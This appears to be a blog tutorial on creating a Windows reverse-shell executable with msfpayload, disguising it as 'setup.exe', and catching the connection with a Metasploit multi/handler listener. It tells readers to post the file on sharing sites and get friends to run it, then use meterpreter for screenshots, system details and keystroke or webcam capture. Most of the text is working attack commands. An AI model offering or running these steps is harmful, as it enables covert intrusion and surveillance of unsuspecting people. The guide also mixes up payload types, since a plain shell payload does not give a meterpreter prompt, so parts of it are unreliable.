Yesterday i posted Exploiting Windows Os using java signed applet code execution to exploiting a windows vulnerability to logging into the system with out username and password using Metasploit.
Today we going to create our own payload in an executable binary to hack windows os.
let’s look at how to create stand-alone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell. We’ll use msfpayload and windows/shell_reverse_tcp. But first, let’s look at the available options for the shell_reverse_tcp payload using the O flag.
#msfpayload windows/shell_reverse_tcp O
Now let’s run msfpayload again and provide the options needed to create this payload in the Windows Portable Executable (PE) format. To do so, we provide the X option as shown at as our output format.
#msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20 LPORT=666 X > /home/sathish/setup.exe
Check the executable file is present in the following path
Now, you need to upload this file, which in this case is setup.exe, to any file uploading and sharing site such as MediaFire or 4shared and then tell this download link of your file to your friends and let them download it
Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen
for reverse connections.
#msf > use exploit/multi/handler
#msf exploit(handler) > show options
#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
#msf exploit(handler) > set LHOST 192.168.31.20
#msf exploit(handler) > set LPORT 666
We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so
that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.
#msf exploit(handler) > exploit
Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer.
Then this will create a channel and you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on. So if you want then type sysinfo to get the system information about the victims computer.
#meterpreter > sysinfo
#meterpreter > screenshot
It will the screenshot of current window desktop.There are also other meterpreter commands like record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
One more thing that this all thing are happen only when firewall and Antivirus is disabled in victims computer.
This tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine.